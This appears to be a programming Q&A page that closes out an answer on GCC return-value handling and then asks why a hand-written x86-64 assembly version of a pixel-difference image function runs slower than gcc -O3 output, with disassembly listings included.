4004de: 48 89 10 mov QWORD PTR [rax],rdx
4004e1: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
4004e5: 48 89 50 08 mov QWORD PTR [rax+0x8],rdx
4004e9: 48 8b 55 f0 mov rdx,QWORD PTR [rbp-0x10]
4004ed: 48 89 50 10 mov QWORD PTR [rax+0x10],rdx
4004f1: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004f5: 5d pop rbp
4004f6: c3 ret
Compiled with O1 it is not allocated but a pointer is passed as an implicit argument
00000000004004b6 <f>:
4004b6: 48 89 f8 mov rax,rdi
4004b9: 48 c7 07 01 00 00 00 mov QWORD PTR [rdi],0x1
4004c0: 48 c7 47 08 02 00 00 mov QWORD PTR [rdi+0x8],0x2
4004c7: 00
4004c8: 48 c7 47 10 03 00 00 mov QWORD PTR [rdi+0x10],0x3
4004cf: 00
4004d0: c3 ret
The closest thing to that in GCC (i.e. a switch for copy elision) is -fcprop-registers. Copy elision doesn't exist in C, but this is the most similar feature to that. From the man page:
After register allocation and post-register allocation instruction
splitting, we perform a copy-propagation pass to try to reduce
scheduling dependencies and occasionally eliminate the copy.
Enabled at levels -O, -O2, -O3, -Os.

Trying to optimize a subroutine in assembly

So I'm trying to optimize with pure assembly this C function that takes 2 images and outputs pixel by pixel its maximum difference in a grey scale:
unsigned short infNorm(unsigned char x1, unsigned char y1, unsigned char z1, unsigned char x2, unsigned char y2, unsigned char z2 ){
short x = abs(x1-x2);
short y = abs(y1-y2);
short z = abs(z1-z2);
if(x <= y){
return y > z ? y : z;
}else{
return x > z ? x : z;
}
}
void diff_c (unsigned char *src, unsigned char *src_2, unsigned char *dst, int m, int n, int src_row_size, int src_2_row_size, int dst_row_size) {
unsigned char (*src_matrix)[src_row_size] = (unsigned char (*)[src_row_size]) src;
unsigned char (*src_2_matrix)[src_2_row_size] = (unsigned char (*)[src_2_row_size]) src_2;
unsigned char (*dst_matrix)[dst_row_size] = (unsigned char (*)[dst_row_size]) dst;
unsigned char n1;
for(int y = 0; y < n; y++){
for(int x = 0; x < m; ++x ){
n1 = infNorm(src_matrix[y][x*4], src_matrix[y][x*4+1], src_matrix[y][x*4+2],
src_2_matrix[y][x*4], src_2_matrix[y][x*4+1], src_2_matrix[y][x*4+2]);
dst_matrix[y][x*4] = n1; //blue
dst_matrix[y][x*4+1] = n1; //red
dst_matrix[y][x*4+2] = n1; //green
dst_matrix[y][x*4+3] = 255; //alpha
}
}
}
I did this using SIMD and got a function that is much more faster than any output from gcc on any optimization flag. Now, I wanted to do the same but without using any SSE instruction. For this I objdumped gcc's build and isolated the part that does this two functions (gcc -O3) to kind of have an I dea of what was gcc doing:
0000000000402280 <infNorm>:
402280: 40 0f b6 ff movzx edi,dil
402284: 0f b6 c9 movzx ecx,cl
402287: 40 0f b6 f6 movzx esi,sil
40228b: 29 cf sub edi,ecx
40228d: 45 0f b6 c0 movzx r8d,r8b
402291: 0f b6 d2 movzx edx,dl
402294: 89 f8 mov eax,edi
402296: 44 29 c6 sub esi,r8d
402299: 45 0f b6 c9 movzx r9d,r9b
40229d: c1 f8 1f sar eax,0x1f
4022a0: 44 29 ca sub edx,r9d
4022a3: 31 c7 xor edi,eax
4022a5: 29 c7 sub edi,eax
4022a7: 89 f0 mov eax,esi
4022a9: c1 f8 1f sar eax,0x1f
4022ac: 31 c6 xor esi,eax
4022ae: 29 c6 sub esi,eax
4022b0: 89 d0 mov eax,edx
4022b2: c1 f8 1f sar eax,0x1f
4022b5: 31 c2 xor edx,eax
4022b7: 29 c2 sub edx,eax
4022b9: 66 39 f7 cmp di,si
4022bc: 7e 12 jle 4022d0 <infNorm+0x50>
4022be: 66 39 d7 cmp di,dx
4022c1: 89 d0 mov eax,edx
4022c3: 0f 4d c7 cmovge eax,edi
4022c6: c3 ret
4022c7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
4022ce: 00 00
4022d0: 66 39 d6 cmp si,dx
4022d3: 89 d0 mov eax,edx
4022d5: 0f 4d c6 cmovge eax,esi
4022d8: c3 ret
4022d9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000004022e0 <diff_c>:
4022e0: 45 85 c0 test r8d,r8d
4022e3: 0f 8e 05 01 00 00 jle 4023ee <diff_c+0x10e>
4022e9: 41 57 push r15
4022eb: 45 31 ff xor r15d,r15d
4022ee: 41 56 push r14
4022f0: 44 8d 34 8d 00 00 00 lea r14d,[rcx*4+0x0]
4022f7: 00
4022f8: 41 55 push r13
4022fa: 41 54 push r12
4022fc: 49 89 f4 mov r12,rsi
4022ff: 55 push rbp
402300: 48 89 fd mov rbp,rdi
402303: 53 push rbx
402304: 48 63 44 24 38 movsxd rax,DWORD PTR [rsp+0x38]
402309: 48 89 44 24 e8 mov QWORD PTR [rsp-0x18],rax
40230e: 49 63 c1 movsxd rax,r9d
402311: 48 89 44 24 f8 mov QWORD PTR [rsp-0x8],rax
402316: 48 63 44 24 40 movsxd rax,DWORD PTR [rsp+0x40]
40231b: 48 89 44 24 f0 mov QWORD PTR [rsp-0x10],rax
402320: 85 c9 test ecx,ecx
402322: 0f 8e a0 00 00 00 jle 4023c8 <diff_c+0xe8>
402328: 31 c0 xor eax,eax
40232a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
402330: 48 63 d8 movsxd rbx,eax
402333: 44 8d 58 01 lea r11d,[rax+0x1]
402337: 44 8d 50 02 lea r10d,[rax+0x2]
40233b: 41 0f b6 34 1c movzx esi,BYTE PTR [r12+rbx*1]
402340: 44 0f b6 4c 1d 00 movzx r9d,BYTE PTR [rbp+rbx*1+0x0]
402346: 4d 63 db movsxd r11,r11d
402349: 4d 63 d2 movsxd r10,r10d
40234c: 42 0f b6 7c 1d 00 movzx edi,BYTE PTR [rbp+r11*1+0x0]
402352: 47 0f b6 2c 14 movzx r13d,BYTE PTR [r12+r10*1]
402357: 41 29 f1 sub r9d,esi
40235a: 44 89 ce mov esi,r9d
40235d: c1 fe 1f sar esi,0x1f
402360: 41 31 f1 xor r9d,esi
402363: 41 29 f1 sub r9d,esi
402366: 43 0f b6 34 1c movzx esi,BYTE PTR [r12+r11*1]
40236b: 29 f7 sub edi,esi
40236d: 89 fe mov esi,edi
40236f: c1 fe 1f sar esi,0x1f
402372: 31 f7 xor edi,esi
402374: 29 f7 sub edi,esi
402376: 42 0f b6 74 15 00 movzx esi,BYTE PTR [rbp+r10*1+0x0]
40237c: 44 29 ee sub esi,r13d
40237f: 41 89 f5 mov r13d,esi
402382: 41 c1 fd 1f sar r13d,0x1f
402386: 44 31 ee xor esi,r13d
402389: 44 29 ee sub esi,r13d
40238c: 41 89 fd mov r13d,edi
40238f: 66 39 fe cmp si,di
402392: 44 0f 4d ee cmovge r13d,esi
402396: 66 44 39 ce cmp si,r9w
40239a: 41 0f 4c f1 cmovl esi,r9d
40239e: 66 41 39 f9 cmp r9w,di
4023a2: 41 0f 4e f5 cmovle esi,r13d
4023a6: 40 88 34 1a mov BYTE PTR [rdx+rbx*1],sil
4023aa: 42 88 34 1a mov BYTE PTR [rdx+r11*1],sil
4023ae: 42 88 34 12 mov BYTE PTR [rdx+r10*1],sil
4023b2: 8d 70 03 lea esi,[rax+0x3]
4023b5: 83 c0 04 add eax,0x4
4023b8: 44 39 f0 cmp eax,r14d
4023bb: 48 63 f6 movsxd rsi,esi
4023be: c6 04 32 ff mov BYTE PTR [rdx+rsi*1],0xff
4023c2: 0f 85 68 ff ff ff jne 402330 <diff_c+0x50>
4023c8: 41 83 c7 01 add r15d,0x1
4023cc: 4c 03 64 24 e8 add r12,QWORD PTR [rsp-0x18]
4023d1: 48 03 6c 24 f8 add rbp,QWORD PTR [rsp-0x8]
4023d6: 48 03 54 24 f0 add rdx,QWORD PTR [rsp-0x10]
4023db: 45 39 c7 cmp r15d,r8d
4023de: 0f 85 3c ff ff ff jne 402320 <diff_c+0x40>
4023e4: 5b pop rbx
4023e5: 5d pop rbp
4023e6: 41 5c pop r12
4023e8: 41 5d pop r13
4023ea: 41 5e pop r14
4023ec: 41 5f pop r15
4023ee: f3 c3 repz ret
So with this in mind, the idea counter to what gcc was doing, was to avoid access to memory as much as possible and using something similar to gcc's I unrolled the loop one time more and wrote this:
diff_asm:
push rbp
push r12
push r13
push r14
push r15
push rbx
sub rsp, 8
mov r15, rdx
mov eax, r8d
mov ecx, ecx
mul rcx
mov rcx, rax
mov rdx, r15
.cicle:
cmp rcx, 0
je .tend
mov rbx, [rdi + rcx*4 - 8]
movzx r12, bl
shr rbx, 8
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 16
mov r15, [rsi + rcx*4 - 8]
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 16
call inf_norm
movzx r12, bl
shr rbx, 8
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 8
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 8
call inf_norm
mov [rdx + rcx*4 - 8], rax
sub rcx, 2
jmp .cicle
.tend:
add rsp, 8
pop rbx
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; r12w = x_1
; r13w = y_1
; r14w = z_1
; rbp = x_2
; r8 = y_2
; r9 = z_3
inf_norm:
sub r12d, ebp
mov ebp, r12d
sar ebp, 0x1f
xor r12d, ebp
sub r12d, ebp
sub r13d, r8d
mov r8d, r13d
sar r8d, 0x1f
xor r13d, r8d
sub r13d, r8d
sub r14d, r9d
mov r9d, r14d
sar r9d, 0x1f
xor r14d, r9d
sub r14d, r9d
cmp r12w, r13w
jg .z_y
cmp r13w, r14w
cmovl r13d, r14d
jmp .insert
.z_y:
cmp r12w, r14w
mov r13d, r14d
cmovge r13d, r12d
.insert:
mov al, r13b
ror rax, 8
mov al, r13b
ror rax, 8
mov al, r13b
ror rax, 8
mov al, 255
ror rax, 8
ret
So now I get that my hand-made assembler routine is in some cases almost two times more slower than gcc -O3/-O2 but for the life of my I don't get why. Are the calls affecting the performance? or are the rotations? Wrote an implementation using shifts instead of rotates but it was a bit more slower than this one. Any help would be appreciated.

Resources